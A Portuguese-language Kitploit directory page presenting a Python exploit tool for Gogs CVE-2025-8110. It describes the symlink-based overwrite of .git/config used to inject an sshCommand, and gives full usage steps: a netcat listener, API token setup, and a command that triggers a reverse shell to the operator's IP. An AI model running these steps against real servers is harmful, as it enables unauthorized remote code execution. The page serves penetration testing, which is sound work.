Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — Gogs CVE-2025-8110 RCE Exploit | Kitploit
Ferramentas/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

Gogs CVE-2025-8110 RCE Exploit

Ver Repositório
13há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gogs CVE-2025-8110 RCE Exploit

Um exploit automatizado em Python para CVE-2025-8110 no Gogs. Esta vulnerabilidade permite a Execução Remota de Código (RCE) ao abusar da API PutContents, que não valida se um caminho de arquivo é um symlink. Ao sobrescrever o arquivo interno .git/config através de um symlink, podemos injetar um sshCommand malicioso para acionar uma reverse shell.

🛠️ Pré-requisitos

Certifique-se de ter Python 3 e as dependências necessárias instaladas:

root@kitploit:~
pip install requests rich beautifulsoup4

Você também deve ter o git instalado e acessível no seu $PATH para a fase de clonagem e commit do repositório.

⚙️ Configuração

1. Acessando a WebUI do Gogs

O Gogs pode estar vinculado a 127.0.0.1:3001. Use o redirecionamento de porta para acessar a WebUI localmente:

root@kitploit:~
ssh -L 3001:127.0.0.1:3001 user@target-ip

2. Criação de Conta

Após o redirecionamento, navegue até http://localhost:3001:

  • Crie uma nova conta.
  • Anote seu Nome de Usuário e Senha para o script.

3. Gerando o Token da API

O script utiliza a API do Gogs para entregar o payload:

  1. Faça login na WebUI.
  2. Navegue até Configurações -> Aplicações.
  3. Em Gerenciar Tokens de Acesso Pessoal, gere um novo token.
  4. Copie o token imediatamente.

🚀 Execução

1. Inicie um Listener Netcat

Inicie seu listener antes de executar o script, pois o shell é acionado assim que a atualização da API é processada.

root@kitploit:~
nc -lvnp 5555

2. Execute o Exploit

Passe suas credenciais e o token como argumentos:

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555

Argumentos

FlagDescrição
-uA URL base da instância Gogs (ex: http://localhost:3001).
-unO nome de usuário da conta que você criou.
-pwA senha da conta que você criou.
-tO token da API gerado em Configurações.
-lhO endereço IP do seu listener (LHOST).
-lpA porta do seu listener (LPORT).

Nota: Se o script travar ou retornar um Read timed out após "Overwriting .git/config", verifique seu listener. Isso geralmente indica que a reverse shell se conectou com sucesso e está mantendo a conexão.


Autor: TYehan

Aviso Legal: Esta ferramenta é apenas para fins educacionais e auditoria de segurança autorizada. Use com responsabilidade.

Baixar ferramenta